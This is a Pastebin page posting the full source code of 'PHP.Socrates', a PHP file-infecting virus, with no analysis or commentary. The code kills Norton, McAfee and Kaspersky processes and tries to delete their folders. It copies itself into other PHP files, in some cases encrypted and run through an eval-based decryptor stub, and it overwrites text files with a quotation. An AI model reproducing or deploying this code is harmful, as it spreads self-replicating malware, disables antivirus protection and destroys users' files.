Advertisement
FlyFar

Virus.PHP.Socrate.a - Source Code

Jul 6th, 2023
795
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 5.47 KB | Cybersecurity | 0 0
  1. <?php
  2. echo("PHP.Socrates by synged flesh"."<br>"."The only true wisdom is in knowing you know nothing.");
  3.  
  4. $decrypt=
  5. "function SocratesDecrypt(\$string,\$key)\r\n"
  6.  
  7. ."{                                 \r\n"
  8.  
  9. ." \$codez='';                       \r\n"
  10.  
  11. ."  for(\$i=0; \$i<strlen(\$string); \$i++)\r\n"
  12.  
  13. ."  {                               \r\n"
  14.  
  15. ."     \$value=ord(\$string[\$i]);     \r\n"
  16.  
  17. ."     \$valuez=\$value+\$key;         \r\n"
  18.  
  19. ."     \$codez.=chr(\$valuez);        \r\n"
  20.  
  21. ."     }                            \r\n"
  22.  
  23. ."       return \$codez;             \r\n"
  24.  
  25. ."  }                               \r\n"
  26.  
  27. ."\$filez = \$_SERVER[\"SCRIPT_NAME\"];\r\n"
  28.  
  29. ."\$break = Explode('/', \$filez);     \r\n"           
  30.  
  31. ."\$pfile = \$break[count(\$break) - 1];\r\n"          
  32.  
  33. ."\$c = fopen(\$pfile,'rb');\r\n"
  34.  
  35. ."\$d = fread(\$c,filesize(\$pfile));\r\n"            
  36.  
  37. ."fclose(\$c);\r\n"
  38.  
  39. ."\$next=strlen(\$d)-693;\r\n"
  40. ."\$virus=substr(\$d,687,\$next);\r\n"
  41.  
  42. ."\$vr=SocratesDecrypt(\$virus,'1');\r\n"
  43.  
  44. ."eval(\$vr);";
  45.  
  46.  
  47. function SocratesCrypt($string,$key)
  48.            
  49. {
  50.  
  51.                $codez="";
  52.  
  53.                   for($i=0; $i<strlen($string); $i++)
  54.  
  55.                        {
  56.      
  57.      
  58.                           $value=ord($string[$i]);
  59.      
  60.      
  61.                           $valuez=$value-$key;
  62.      
  63.      
  64.                           $codez.=chr($valuez);
  65.      
  66.    
  67.                        }
  68.        
  69.        
  70.                              return $codez;
  71.  
  72.            
  73. }
  74.  
  75.                               if(is_dir("C:\Program Files\Norton*"))
  76.                                        {
  77.                                            
  78. exec("taskkill /f /t /im nod32.exe");
  79.                                            
  80. rmdir("C:\Program Files\Norton*");
  81.  
  82.                                        }
  83.  
  84.                                           if(is_dir("C:\Program Files\McAfee*"))
  85.                                            {
  86.  
  87.                                               exec("taskkill /f /t /im Mcshield.exe");
  88.                                              
  89. rmdir("C:\Program Files\McAfee*");
  90. }
  91.  
  92.                                          
  93.                                           if(is_dir("C:\Program Files\Kaspersky*"))
  94.  
  95.                                            {
  96.                                              
  97. exec("taskkill /f /t /im KAV.exe");
  98.                                              
  99. rmdir("C:\Program Files\Kaspersky*");
  100.  
  101.                                            }
  102.        
  103.  
  104. $filez = $_SERVER["SCRIPT_NAME"];
  105. $break = Explode('/', $filez);         
  106. $pfile = $break[count($break) - 1];  
  107. $c = fopen($pfile,'rb');
  108.  
  109. $d = fread($c,filesize($pfile));            
  110.  
  111. fclose($c);
  112.  
  113. $nextsize=strlen($d)-4;
  114. $virus=(substr($d,7,$nextsize));
  115. $dir=opendir('*.*');  
  116.            
  117. while (($file = readdir($dir)) !== false)
  118.                                          
  119.                      
  120.             {
  121.                                            
  122.                  if (strstr($file,'.php'))
  123.                                                
  124.                         {  
  125.                                                    
  126.                            $f = fopen($file,'rb');            
  127.                                                    
  128.                            $contents = fread($f, filesize($file));
  129.                                                      
  130.                  if (!strstr($contents, 'Socrates'))
  131.                                                        
  132.                            {  
  133.                                                                                                                               if(!file_exists("Socrates.php")) {
  134.                                  fclose($f);
  135.                                                                                                                    $g = fopen($file,'w');
  136.                                                                                                         fwrite($g,$d);
  137.    
  138.                                  fclose($g);
  139.    
  140.                                  }
  141.  
  142.  
  143.  
  144.                              if(file_exists("Socrates.php"))
  145.                                {
  146.                                  fclose($f);
  147.                                                                                                                    $g = fopen($file,'w');
  148.                                                                                                         fwrite($g,'<?php'.chr(13).chr(10).$decrypt.'/*'.SocratesCrypt($virus,'1').'*/'.'?>');
  149.    
  150.                                  fclose($g);
  151.            
  152.                                }
  153.                            
  154.                              
  155.                                          
  156.                                
  157.                            
  158.                           }
  159.                                                
  160.                        }
  161.                                            
  162.                          if (strstr($file,'.txt'))
  163.                                                
  164.                             {  
  165.                                                  
  166.                                  $f = fopen($file,'w');    
  167.                                                  
  168.                                  fwrite($f,"Let him that would move the world, first move himself.");
  169.                                                
  170.                             }
  171.                      
  172.            }?>
  173.  
  174.  
Tags: php virus
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement